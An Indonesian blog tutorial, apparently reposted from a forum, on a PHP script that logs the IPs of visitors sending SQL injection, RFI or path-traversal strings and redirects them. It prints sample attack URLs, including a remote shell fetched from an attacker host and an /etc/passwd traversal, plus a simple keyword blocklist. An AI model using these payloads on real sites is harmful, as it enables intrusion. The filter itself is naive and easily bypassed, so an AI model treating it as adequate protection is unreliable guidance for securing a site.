Support Idiot Attacker dengan klik subscribe di channel Disini, Banyak konten-konten Idiot attacker yg di upload disana.
Mengamankan web dengan Auto Blacklist

Mengamankan web dengan Auto Blacklist

Rio Setyawan 5:39 PM
Mengamankan web dengan Auto Blacklist

Assalamualaikum,
Pagi ini saya mau berbagi tutorial Mengamankan web dengan Auto Blacklist yang saya dapat dari forum Hacker newbie.
Dimana apabila ada attacker yang mau nyoba-nyoba dengan web kita menggunakan tehnik SQL Injection maupun LFI/RFI maka web akan secara otomatis memasukan IPnya ke daftar blacklist dan secara otomatis mengalihkan attacker ke halaman yang sudah kita tentukan sebelumnya.

Oke langsung saja ke tutorialnya.

Pertama buatlah sebuah tabel pada database kamu, contoh tabel blacklist
 CREATE TABLE `blacklist` (
`ip_attacker` varchar(50) NOT NULL
)

Sekarang kita akan membuat sebuah file yang akan mendeteksi gerak-gerik sang attacker tersebut, dan apabila terdeteksi melakukan sesuatu hal yang dianggap melakukan Pengijeksiaan maka akan otomatis menyalin IP attacker tersebut

file "blacklist.php"
 <?
//Deteksi user yang memasukan sebuah perintah penginjesian terhadap web kita
if(strpos($_SERVER['REQUEST_URI'], "%27") || strpos($_SERVER['REQUEST_URI'], "union") || strpos($_SERVER['REQUEST_URI'], "http://") || strpos($_SERVER['REQUEST_URI'], "www.") || strpos($_SERVER['REQUEST_URI'], "../") || strpos($_SERVER['REQUEST_URI'], "etc/passwd")) {

//Apabila terdeteksi melakukan penginjeksian, ambil IP mereka
$ip = $_SERVER['REMOTE_ADDR'];

//Kirim IP ke database kita
$kirim_ip = mysql_query("INSERT INTO blacklist VALUE ('$ip')");
}
?>


Setelah itu masuk ke file yang kamu rasa dapat di injeksi, saya contohkan file index.php

Contoh Penginjeksian oleh attacker

www.webkamu.com/index.php?id=1' (SQL Injection)
www.webkamu.com/index.php?page=http://www.root.attacker/shell.txt (RFI/LFI)
www.webkamu.com/index.php?page=../../etc/passwd (RFI/LFI)

Untuk penjelasan tehnik diatas mungkin bisa di googling sendiri atau mungkin sudah banyak yang tahu.

Oke Next..

Setelah masuk ke file index.php lakukan pengonekan pada file blacklist.php, gunakan fungsi include()
 include "blacklist.php";

Terus jangan lupa lakukan penganalisian IP, untuk mengalihkan attacker ke tempat lain apabila attacker mengakses web kita lagi.
 <?
//Periksa IP attacker tersebut apa pernah masuk ke database kita
$ipattacker = mysql_query("SELECT * FROM blacklist where ip_attacker = '".$_SERVER['REMOTE_ADDR']."'");
$konfirmasi_attacker = mysql_num_rows($ipattacker);

//Apabila IP telah terdeteksi pernah masuk ke database maka alihkan attacker ke halaman lain, contoh :google.com
if ($konfirmasi_attacker !== 0) {
header('Location:http://google.com');
}
?>

Sekian, semoga sedikit membantu dalam pengamanan web kita dari tangan-tangan jahil


CC: Tolonggalo Hacker Newbie

Tag: cara mengamankan website, cara auto blacklist di web, membuat auto blacklist website, blacklist website, tips mengamankan website
Next
« Prev Post
Previous
Next Post »
0 Komentar
Post a Comment
Subscribe to: Post Comments (Atom)